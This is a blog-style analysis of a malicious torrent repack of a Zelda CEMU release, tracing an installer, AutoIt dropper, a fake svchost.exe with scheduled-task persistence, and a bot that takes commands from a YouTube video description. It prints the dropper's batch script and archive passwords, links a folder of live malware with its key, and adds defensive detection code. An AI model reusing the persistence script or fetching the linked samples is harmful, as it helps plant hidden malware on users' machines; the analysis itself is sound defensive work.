Analyzing Torrent Repack Malware Using YouTube as C&C
Never trust a repack…
The torrent I looked at was: The Legend of Zelda: Breath of the Wild CEMU 1.8.0b [Multi-Lang] by HZolomon.
TL;DR: It is definitely malware. All the torrents by HZolomon appear to have been infected with malware equal or similar to this one.
[MEGA Folder with relevant files] WARNING: THIS CONTAINS ACTIVE MALWARE (in case you didn’t read the title and like executing random files)… The key is 8NcPVw1TCm_dvZM9s2SU_g.
Tooling
I used x64dbg, DbgChild, TitanHide, CFF Explorer, Exe2Aut and VirtualBox.
You have to select the checkboxes in the DbgChild plugin to automatically attach x64dbg to any process started by the executable you’re currently debugging:
From here on I’ll just give a brief description of each analysis step.
setup.exe
- With `innoextract` (`innounp` has a similar error):

```
Stream error while parsing setup headers!
├─ detected setup version: 5.4.2
└─ error reason: basic_ios::clear
If you are sure the setup file is not corrupted, consider
filing a bug report at http://innoextract.constexpr.org/issues
Done with 1 error.
```
- Extracts `%temp%\is-[A-Z0-9]{5}.tmp\setup.tmp` (`is-K35T2.tmp` in the MEGA folder).
- Probably this is: http://forum.ru-board.com/topic.cgi?forum=5&topic=34920&start=0&limit=1&m=1#1 and/or http://krinkels.org/resources/categories/innoultra.29/
setup.tmp
Command line (this is similar to what InnoSetup does from what I know):

```
"C:\Users\Admin\AppData\Local\Temp\is-RPR25.tmp\setup.tmp" /SL5="$230522,1892858,54272,F:\Users\Admin\Documents\Downloads\The Legend of Zelda - Breath of the Wild\setup.exe"
```
- Extracts `%temp%\is-[A-Z0-9]{5}.tmp\ISDone.dll` and some other files (including `unarc.dll`).
- Put a DLL breakpoint on `unarc.dll` in x64dbg.
- Start the installation, which causes more stuff to be extracted to `%temp%\is-[A-Z0-9]{5}.tmp`. All the extracted files are hidden. You can use `attrib -S -H` to unhide them (Windows Explorer doesn’t allow you to uncheck the Hidden box for some reason).
- Break on `FreeArcExtract` (see my earlier blog post for more details). TL;DR: it runs `unarc.exe` with the function arguments as command line arguments. Some of the commands used in `FreeArcExtract`:

```
l -- setup-2.bin
x -o+ -pawdawdawd -wF:\BotW\ -dpF:\BotW\ -- setup-2.bin
```
- Find `cbArcExtract` at `ISDone.dll:$1A340` from the first parameter of `FreeArcExtract`, break on the `password?` action check:

```
Arc password: awdawdawd
```

The `unarc.dll` uses compression algorithm hooks from `facompress.dll` (relevant code) + hooks for CLS compressors (relevant code, `CLS-MSC.dll`, `CLS-srep.dll`), so make sure to put those next to `unarc.exe` if you want to (safely) extract the files.
- After all the files are extracted it runs `DSETUP.exe`, which at first looked fine, but looking a second time the file is not signed by Microsoft and it has no version information or anything.
DSETUP.exe
This is an AutoIt executable (32 bit), it’s basically the first layer of the dropper. With Exe2Aut I extracted the script (slightly deobfuscated by hand):
It tries to identify your anti-virus and based on that drops `CLDe2bugLog.txt` in your temp directory with the `FileInstall` function. It then replaces the bytes `00000000001C0004` with `377ABCAF271C0004` (7z header) and extracts it with the following command:

```
CLDe2bugLog.txt e -p"DQMDDMNBQ3824Nnd2nd8812@2*$(#!&NDQB2" CRDebugLog.txt
```
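The signature wipe above is a cheap way to keep a 7z archive from looking like one on disk. The following is an added example (not from the original post) of how an analyst can recognise the wiped prefix, put the real magic back and then confirm the result is a plausible 7z file by checking the StartHeaderCRC field of the 7z signature header; the sample archive bytes are constructed here, not taken from the malware.

```python
import struct
import zlib

# 7z signature header (32 bytes): 6-byte magic, 2-byte version, 4-byte CRC32
# of the 20 bytes that follow (NextHeaderOffset, NextHeaderSize, NextHeaderCRC).
SEVENZ_MAGIC = bytes.fromhex("377ABCAF271C")
# Prefix the dropper leaves on disk (first five magic bytes zeroed) and the
# real prefix it writes back before calling the extractor, as quoted above.
WIPED_PREFIX = bytes.fromhex("00000000001C0004")
REAL_PREFIX = bytes.fromhex("377ABCAF271C0004")


def is_wiped_7z(data: bytes) -> bool:
    """True if the file starts with the zeroed 7z prefix used by this dropper."""
    return data[:8] == WIPED_PREFIX


def start_header_crc_ok(data: bytes) -> bool:
    """Check StartHeaderCRC (bytes 8..12) against the 20 bytes after it."""
    if len(data) < 32:
        return False
    stored = struct.unpack_from("<I", data, 8)[0]
    return zlib.crc32(data[12:32]) == stored


def restore_7z_signature(data: bytes) -> bytes:
    """Put the real magic back, mirroring the dropper's byte replacement."""
    if not is_wiped_7z(data):
        raise ValueError("input does not start with the wiped 7z prefix")
    return REAL_PREFIX + data[8:]


def make_sample_wiped_archive() -> bytes:
    """Constructed sample: a valid 7z start header, then wiped the way the
    dropper's CRDebugLog.txt is (the payload bytes after it are dummies)."""
    next_header = struct.pack("<QQI", 0x20, 0x10, 0)  # offset, size, crc
    crc = zlib.crc32(next_header)
    header = REAL_PREFIX + struct.pack("<I", crc) + next_header
    return WIPED_PREFIX + header[8:] + b"\x00" * 0x30


if __name__ == "__main__":
    wiped = make_sample_wiped_archive()
    restored = restore_7z_signature(wiped)
    print("wiped prefix:", is_wiped_7z(wiped),
          "magic restored:", restored[:6] == SEVENZ_MAGIC,
          "start-header CRC ok:", start_header_crc_ok(restored))
```

A restored file whose StartHeaderCRC does not verify is either not a 7z archive at all or has been tampered with beyond the signature, so it is worth carving by hand before feeding it to an extractor.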
The contents of `CRDebugLog.txt` vary, but the malware inside does pretty much the same thing. I (unfortunately) looked at the contents of `dxdllreg_x86`:

- `64.exe`
- `SystemCheck.xml`
- `start.bat`

start.bat

```
attrib -h -r -s /S /D %userprofile%\AppData\Roaming\Microsoft\Windows\\svchost.exe
copy /y "64.exe" "%userprofile%\AppData\Roaming\Microsoft\Windows\svchost.exe"
attrib +h +r +s /S /D %userprofile%\AppData\Roaming\Microsoft\Windows\\svchost.exe
schtasks.exe /Create /XML "SystemCheck.xml" /TN "System\SystemCheck"
del 64.exe /f
del SystemCheck.xml /f
del CRDebugLog.txt /f
del CLDebugLog.txt /f
del "%0"
```
This copies the file to `%userprofile%\AppData\Roaming\Microsoft\Windows\svchost.exe`, which made it clear that this is indeed a malicious file. It then goes on to create a scheduled task with `SystemCheck.xml`.
SystemCheck.xml
This executes the newly-created `svchost.exe` with the `-WindowsCheck` command line every X amount of time (probably days, not really worth exploring in this case).
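The persistence above boils down to a file named like a core Windows binary living under a user profile, launched by a scheduled task. As an added example (not code from the original post), the following parses a Task Scheduler XML definition and flags exactly that pattern; the task XML is a constructed sample in the Task Scheduler schema that only mirrors what the post says `SystemCheck.xml` does, not the real file.

```python
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Real Windows binaries that should only ever run from the system directories.
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}
TRUSTED_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")

# Constructed sample (hypothetical): a task that runs the repack's fake
# svchost.exe with -WindowsCheck, as the post describes SystemCheck.xml doing.
SAMPLE_TASK_XML = """<Task version="1.2"
  xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\svchost.exe</Command>
      <Arguments>-WindowsCheck</Arguments>
    </Exec>
  </Actions>
</Task>"""


def exec_actions(task_xml: str):
    """Yield (command, arguments) for every <Exec> action in a task definition."""
    root = ET.fromstring(task_xml)
    for ex in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = ex.findtext("t:Command", default="", namespaces=TASK_NS)
        args = ex.findtext("t:Arguments", default="", namespaces=TASK_NS)
        yield cmd.strip().strip('"'), args.strip()


def masquerading_system_binary(command: str) -> bool:
    """True if the command is named like a core system binary but does not
    live in System32/SysWOW64 (e.g. the svchost.exe dropped into AppData)."""
    p = PureWindowsPath(command)
    if p.name.lower() not in SYSTEM_BINARY_NAMES:
        return False
    return not str(p.parent).lower().startswith(TRUSTED_DIRS)


def suspicious_actions(task_xml: str) -> list:
    """Return the (command, arguments) pairs that warrant a closer look."""
    return [(c, a) for c, a in exec_actions(task_xml)
            if masquerading_system_binary(c)]


if __name__ == "__main__":
    for cmd, args in suspicious_actions(SAMPLE_TASK_XML):
        print("suspicious task action:", cmd, args)
```

On a live host the same check can be run over the XML that `schtasks /Query /XML` emits for each task, which is how the dropped `\System\SystemCheck` task would surface.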
64.exe (svchost.exe)
This file is packed with Enigma x64. TitanHide works fine for debugging Enigma (ScyllaHide has issues). The original entry point (OEP) is at `64.exe:$3059C`. It has stolen bytes, but they are easy to retrieve:

```
48 83 EC 28 E8 BF B3 00 00 48 83 C4 28 E9 36 FE FF FF
```
EDIT: I have been asked on reddit to give more details about the “stolen bytes” mentioned here. Before I could answer user izizizizizizi gave a nice explanation:
“Stolen bytes” (is there any non-colloquial name for this I wonder) is a feature of many packers/protectors which prevents easy dumping. During the protection process, a part of the original executable code gets removed and stored in the protector stub. When it’s about to be executed there’s a redirection to the protector’s code instead of the original function. The stub either writes original code in some dynamic buffer and executes it or an obfuscated version of the original function is executed.
To get them I created my own Hello World-style AutoIt executable and pasted the entry point.
After ‘unpacking’ Enigma, I extracted the `SCRIPT` resource and put it in a Hello World AutoIt executable (32 bit); I then used `Exe2Aut.exe` to get the AutoIt script source code (irrelevant parts omitted):
The interesting part is the `bot()` function:
It uses a YouTube video (reported, but please report again) as a command and control mechanism. If the description contains one of the `_download`, `_run`, etc. commands it will perform certain actions based on the data in the description (such as downloading a file or updating to a newer version).
It also appears to run some kind of crypto currency miner, although I couldn’t find the `SystemCheck` executable:
Well, that has been all for today. It has certainly been fun reversing malware for a change!
“Have I already salted that?”